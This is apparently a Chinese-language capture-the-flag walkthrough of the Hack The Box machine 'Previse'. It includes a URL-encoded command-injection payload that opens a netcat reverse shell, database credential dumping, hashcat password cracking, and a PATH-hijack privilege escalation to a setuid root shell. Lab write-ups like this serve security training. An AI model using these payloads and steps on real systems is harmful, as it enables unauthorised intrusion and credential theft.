基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ nmap -sC -sV 10.10.11.104

Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-11 15:01 CST
Nmap scan report for 10.10.11.104
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.59 seconds

80

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
gobuster dir -u http://10.10.11.104/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/favicon.ico          (Status: 200) [Size: 15406]
/files.php            (Status: 302) [Size: 4914] [--> login.php]
/footer.php           (Status: 200) [Size: 217]
/header.php           (Status: 200) [Size: 980]
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/login.php            (Status: 200) [Size: 2224]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/logs.php             (Status: 302) [Size: 0] [--> login.php]
/server-status        (Status: 403) [Size: 277]
/status.php           (Status: 302) [Size: 2966] [--> login.php]

accounts.php

任意请求都是跳转到login,但根据burp记录,可以看到页面内容,只是遵循响应302跳转,尝试拦截修改响应,可以正常访问:

files

创建账号,登录,files里发现一个备份文件:

siteBackup

下载解压,查看文件,其中config里可以得到数据库密码,logs里发现exec拼接参数,可以命令注入:

config.php

1
2
3
4
5
6
7
8
9
10
11
12
<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

logs.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
}
?>

命令注入

logs就是网页上的LOG DATA功能,命令注入getshell:

1
comma;rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.14.7%204444%20%3E/tmp/f

mysql

使用前面config里得到的mysql账号密码查看数据,可以得到m4lwhere账号密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
mysql> use previse
use previse
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
2 rows in set (0.00 sec)

mysql> desc accounts;
desc accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field      | Type         | Null | Key | Default           | Extra          |
+------------+--------------+------+-----+-------------------+----------------+
| id         | int(11)      | NO   | PRI | NULL              | auto_increment |
| username   | varchar(50)  | NO   | UNI | NULL              |                |
| password   | varchar(255) | NO   |     | NULL              |                |
| created_at | datetime     | YES  |     | CURRENT_TIMESTAMP |                |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.01 sec)

mysql> select username,password from accounts;
select username,password from accounts;
+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. |
| miaomiao | $1$🧂llol$utY3ViR6xEFtKTaHwL.tn0 |
+----------+------------------------------------+
2 rows in set (0.00 sec)

mysql>

hash crack

破解出来密码,密码在rockyou的中间位置(51.68%左右),需要花费一点时间:

1
2
3
sudo hashcat -a 0 -m 500 hash.txt /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

user flag

m4lwhere ssh登录,得到user.txt:

1
m4lwhere : ilovecody112235!

提权信息

可以Sudo运行一个脚本,里面调用gzip,没有使用绝对路径,可以环境变量劫持:

提权 & root flag

1
2
3
4
5
6
7
8
9
10
m4lwhere@previse:/tmp$ nano gzip
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
m4lwhere@previse:/tmp$ ls -al b
-rwsr-sr-x 1 root root 1113504 Aug 11 08:11 b
m4lwhere@previse:/tmp$ ./b -p

参考资料